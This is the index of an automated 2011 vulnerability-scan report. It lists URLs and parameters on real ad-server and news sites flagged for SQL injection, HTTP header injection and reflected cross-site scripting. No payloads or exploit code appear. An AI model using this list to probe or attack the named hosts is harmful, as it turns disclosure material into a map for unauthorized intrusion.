DORK, Report, XSS, 2-14-2011, SQL Injection, HTTP Header Injection

CAPEC-66: SQL Injection,CAPEC-86: Embedding Script (XSS ) in HTTP Headers

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 09:58:08 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://ad.yieldmanager.com/imp [r parameter]

1.2. http://ads.asp.net/a.aspx [%24CC cookie]

1.3. http://ads.asp.net/a.aspx [%24RC cookie]

1.4. http://c5.zedo.com//ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js [REST URL parameter 11]

1.5. http://googleads.g.doubleclick.net/pagead/ads [Referer HTTP header]

1.6. http://googleads.g.doubleclick.net/pagead/ads [bih parameter]

1.7. http://googleads.g.doubleclick.net/pagead/ads [ga_fc parameter]

1.8. http://googleads.g.doubleclick.net/pagead/ads [lmt parameter]

1.9. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

1.10. http://googleads.g.doubleclick.net/pagead/ads [oe parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [region parameter]

1.12. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]

1.13. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter]

1.14. http://sitelife.desmoinesregister.com/ver1.0/SiteLifeProxy [name of an arbitrarily supplied request parameter]

1.15. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]

1.16. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.17. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.18. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.19. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.20. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.21. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.22. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.23. http://www.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 3]

1.24. http://www.desmoinesregister.com/scripts/app/js/jquery-1.3.1.min.js [REST URL parameter 2]

1.25. http://www.quantcast.com/global/personalHeader [qcVisitor cookie]

1.26. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

2. HTTP header injection

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

2.2. http://ad.doubleclick.net/ad/N2724.UndertoneNetwork/B4504763.26 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/ad/N3867.ContextWeb/B5127624.18 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/ad/N6457.4298.ADVERTISING.COM/B4840137.15 [REST URL parameter 1]

2.5. http://ad.doubleclick.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7 [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adi/N2724.Specific_Media/B4323655.35 [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adi/N3285.usatoday/B2343920.27 [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adi/N5367.3630.247REALMEDIAINC.1/B4475978.2 [REST URL parameter 1]

2.14. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [REST URL parameter 1]

2.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [REST URL parameter 1]

2.16. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.11 [REST URL parameter 1]

2.17. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.16 [REST URL parameter 1]

2.18. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.2 [REST URL parameter 1]

2.19. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.38 [REST URL parameter 1]

2.20. http://ad.doubleclick.net/adj/N4233.RSI/B4932906.5 [REST URL parameter 1]

2.21. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [REST URL parameter 1]

2.22. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.19 [REST URL parameter 1]

2.23. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.20 [REST URL parameter 1]

2.24. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.21 [REST URL parameter 1]

2.25. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B3792881.193 [REST URL parameter 1]

2.26. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.2 [REST URL parameter 1]

2.27. http://ad.doubleclick.net/adj/N6092.AOL/B5108587.3 [REST URL parameter 1]

2.28. http://ad.doubleclick.net/adj/cm.drudgerep/ [REST URL parameter 1]

2.29. http://ad.doubleclick.net/adj/drudgereport.ilm/remnant [REST URL parameter 1]

2.30. http://ad.doubleclick.net/adj/pmv.inm.ind/news_home [REST URL parameter 1]

2.31. http://ad.doubleclick.net/adj/resn.173878/ [REST URL parameter 1]

2.32. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [REST URL parameter 1]

2.33. http://ad.doubleclick.net/adj/wpni.politics [REST URL parameter 1]

2.34. http://ad.doubleclick.net/adj/wpni.politics/inlinead [REST URL parameter 1]

2.35. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

2.36. http://amch.questionmarket.com/adscgen/sta.php [name of an arbitrarily supplied request parameter]

2.37. http://bidder.mathtag.com/notify [exch parameter]

2.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

2.40. http://c7.zedo.com/utils/ecSet.js [v parameter]

2.41. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 2]

2.42. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 3]

2.43. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

2.44. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

2.45. http://dw.com.com/clear/c.gif [REST URL parameter 2]

2.46. http://live.activeconversion.com/webtracker/track2.html [avc parameter]

2.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

2.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

2.49. http://w55c.net/m.gif [rurl parameter]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

3.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1]

3.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2]

3.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3]

3.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter]

3.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter]

3.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2]

3.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter]

3.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter]

3.10. http://a.rfihub.com/sed [pa parameter]

3.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]

3.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]

3.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter]

3.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter]

3.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter]

3.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter]

3.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter]

3.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter]

3.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter]

3.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter]

3.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter]

3.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter]

3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter]

3.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter]

3.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter]

3.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter]

3.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

3.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

3.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

3.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

3.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

3.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

3.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

3.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

3.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

3.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

3.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

3.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

3.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

3.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

3.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

3.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

3.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

3.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter]

3.45. http://ad.doubleclick.net/adj/wpni.politics/inlinead [ad parameter]

3.46. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

3.47. http://ad.media6degrees.com/adserv/cs [tId parameter]

3.48. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.49. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

3.50. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

3.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

3.52. http://ads.adxpose.com/ads/ads.js [uid parameter]

3.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

3.54. http://ads.specificmedia.com/serve/v=5 [m parameter]

3.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

3.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

3.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

3.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1]

3.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

3.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

3.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

3.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

3.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

3.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

3.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

3.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

3.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

3.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

3.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

3.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

3.71. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

3.72. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

3.73. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]

3.74. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

3.75. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

3.76. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]

3.77. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

3.78. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

3.79. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

3.80. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

3.81. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

3.82. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

3.83. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]

3.84. http://ak.quantcast.com/wp-content/themes/quantcast/css/not_ie.min.css [REST URL parameter 1]

3.85. http://ak.quantcast.com/wp-content/themes/quantcast/css/print.min.css [REST URL parameter 1]

3.86. http://ak.quantcast.com/wp-content/themes/quantcast/css/style.min.css [REST URL parameter 1]

3.87. http://ak.quantcast.com/wp-content/themes/quantcast/js/jquery.jstree.js [REST URL parameter 1]

3.88. http://ak.quantcast.com/wp-content/themes/quantcast/js/minified.js [REST URL parameter 1]

3.89. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter]

3.90. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter]

3.91. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter]

3.92. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter]

3.93. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter]

3.94. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter]

3.95. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.96. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.97. http://api.dimestore.com/viapi [id parameter]

3.98. http://api.echoenabled.com/v1/search [q parameter]

3.99. http://api.facebook.com/restserver.php [method parameter]

3.100. http://api.facebook.com/restserver.php [method parameter]

3.101. http://api.facebook.com/restserver.php [query parameter]

3.102. http://api.facebook.com/restserver.php [urls parameter]

3.103. http://api.js-kit.com/v1/count [q parameter]

3.104. http://ar.voicefive.com/b/rc.pli [func parameter]

3.105. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.106. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.107. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.108. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.109. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.110. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.111. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.112. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.113. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2]

3.114. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3]

3.115. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4]

3.116. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5]

3.117. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6]

3.118. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7]

3.119. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2]

3.120. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3]

3.121. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4]

3.122. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5]

3.123. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6]

3.124. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7]

3.125. http://bid.openx.net/json [c parameter]

3.126. http://blogs.desmoinesregister.com/dmr/ [REST URL parameter 1]

3.127. http://blogs.desmoinesregister.com/dmr/ [REST URL parameter 1]

3.128. http://blogs.desmoinesregister.com/dmr/ [name of an arbitrarily supplied request parameter]

3.129. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

3.130. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

3.131. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

3.132. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

3.133. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [name of an arbitrarily supplied request parameter]

3.134. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

3.135. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

3.136. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

3.137. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

3.138. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

3.139. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

3.140. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

3.141. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

3.142. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

3.143. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

3.144. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

3.145. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

3.146. http://blogs.desmoinesregister.com/odygel/lib/3rdparty/gigya/gigya.js [REST URL parameter 5]

3.147. http://blogs.desmoinesregister.com/odygel/lib/3rdparty/gigya/gigya.js [REST URL parameter 5]

3.148. http://blogs.desmoinesregister.com/odygel/lib/analytics/analytics.js [REST URL parameter 4]

3.149. http://blogs.desmoinesregister.com/odygel/lib/analytics/analytics.js [REST URL parameter 4]

3.150. http://blogs.desmoinesregister.com/odygel/lib/anim/yuianimator.js [REST URL parameter 4]

3.151. http://blogs.desmoinesregister.com/odygel/lib/anim/yuianimator.js [REST URL parameter 4]

3.152. http://blogs.desmoinesregister.com/odygel/lib/cookie/cookie.js [REST URL parameter 4]

3.153. http://blogs.desmoinesregister.com/odygel/lib/cookie/cookie.js [REST URL parameter 4]

3.154. http://blogs.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 4]

3.155. http://blogs.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 4]

3.156. http://blogs.desmoinesregister.com/odygel/lib/dateutil/dateutil.js [REST URL parameter 4]

3.157. http://blogs.desmoinesregister.com/odygel/lib/dateutil/dateutil.js [REST URL parameter 4]

3.158. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN//UI.js [REST URL parameter 5]

3.159. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN//UI.js [REST URL parameter 5]

3.160. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/GDNpostload.js [REST URL parameter 5]

3.161. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/GDNpostload.js [REST URL parameter 5]

3.162. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/GDNpreload.js [REST URL parameter 5]

3.163. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/GDNpreload.js [REST URL parameter 5]

3.164. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

3.165. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

3.166. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UREvents/ZagUser.js [REST URL parameter 6]

3.167. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UREvents/ZagUser.js [REST URL parameter 6]

3.168. http://blogs.desmoinesregister.com/odygel/lib/remoting/remoting.js [REST URL parameter 4]

3.169. http://blogs.desmoinesregister.com/odygel/lib/remoting/remoting.js [REST URL parameter 4]

3.170. http://blogs.desmoinesregister.com/odygel/lib/selector/selector.js [REST URL parameter 4]

3.171. http://blogs.desmoinesregister.com/odygel/lib/selector/selector.js [REST URL parameter 4]

3.172. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

3.173. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

3.174. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

3.175. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

3.176. http://blogs.desmoinesregister.com/odygel/lib/userauth/userauth.js [REST URL parameter 4]

3.177. http://blogs.desmoinesregister.com/odygel/lib/userauth/userauth.js [REST URL parameter 4]

3.178. http://blogs.desmoinesregister.com/odygel/lib/userauth/validateform.js [REST URL parameter 4]

3.179. http://blogs.desmoinesregister.com/odygel/lib/userauth/validateform.js [REST URL parameter 4]

3.180. http://blogs.desmoinesregister.com/odygel/lib/widgets/banner/banner.js [REST URL parameter 5]

3.181. http://blogs.desmoinesregister.com/odygel/lib/widgets/banner/banner.js [REST URL parameter 5]

3.182. http://blogs.desmoinesregister.com/odygel/lib/widgets/modal/modal.js [REST URL parameter 5]

3.183. http://blogs.desmoinesregister.com/odygel/lib/widgets/modal/modal.js [REST URL parameter 5]

3.184. http://blogs.desmoinesregister.com/odygel/lib/widgets/navigation/navController.js [REST URL parameter 5]

3.185. http://blogs.desmoinesregister.com/odygel/lib/widgets/navigation/navController.js [REST URL parameter 5]

3.186. http://blogs.desmoinesregister.com/odygel/lib/widgets/tabs/geltabs.js [REST URL parameter 5]

3.187. http://blogs.desmoinesregister.com/odygel/lib/widgets/tabs/geltabs.js [REST URL parameter 5]

3.188. http://blogs.desmoinesregister.com/odygel/lib/widgets/time/time.js [REST URL parameter 5]

3.189. http://blogs.desmoinesregister.com/odygel/lib/widgets/time/time.js [REST URL parameter 5]

3.190. http://blogs.desmoinesregister.com/odygel/lib/widgets/widget.js [REST URL parameter 4]

3.191. http://blogs.desmoinesregister.com/odygel/lib/widgets/widget.js [REST URL parameter 4]

3.192. http://blogs.desmoinesregister.com/odygel/lib/widgets/zagmodal/zagmodal.js [REST URL parameter 5]

3.193. http://blogs.desmoinesregister.com/odygel/lib/widgets/zagmodal/zagmodal.js [REST URL parameter 5]

3.194. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

3.195. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

3.196. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

3.197. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

3.198. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

3.199. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [adRotationId parameter]

3.200. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [bannerCreativeAdModuleId parameter]

3.201. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

3.202. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

3.203. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

3.204. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

3.205. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [syndicationOutletId parameter]

3.206. http://cache.vindicosuite.com/xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp [coad parameter]

3.207. http://creativeby2.unicast.com/dynamic.js [pid parameter]

3.208. http://creativeby2.unicast.com/dynamic.js [vnam parameter]

3.209. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

3.210. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

3.211. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

3.212. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

3.213. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

3.214. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

3.215. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

3.216. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

3.217. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

3.218. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

3.219. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

3.220. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]

3.221. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

3.222. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

3.223. http://dev.inskinmedia.com/trackports/rep/base/track.php [callback parameter]

3.224. http://dev.inskinmedia.com/trackports/rep/base/track.php [type parameter]

3.225. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 2]

3.226. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 3]

3.227. http://dm.de.mookie1.com/2/B3DM/2010DM/11355486136@x23 [REST URL parameter 4]

3.228. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 2]

3.229. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 3]

3.230. http://dm.de.mookie1.com/2/B3DM/2010DM/11473307965@x23 [REST URL parameter 4]

3.231. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 2]

3.232. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 3]

3.233. http://dm.de.mookie1.com/2/B3DM/2010DM/11781759243@x23 [REST URL parameter 4]

3.234. http://ebay.adnxs.com/ttj [pt1 parameter]

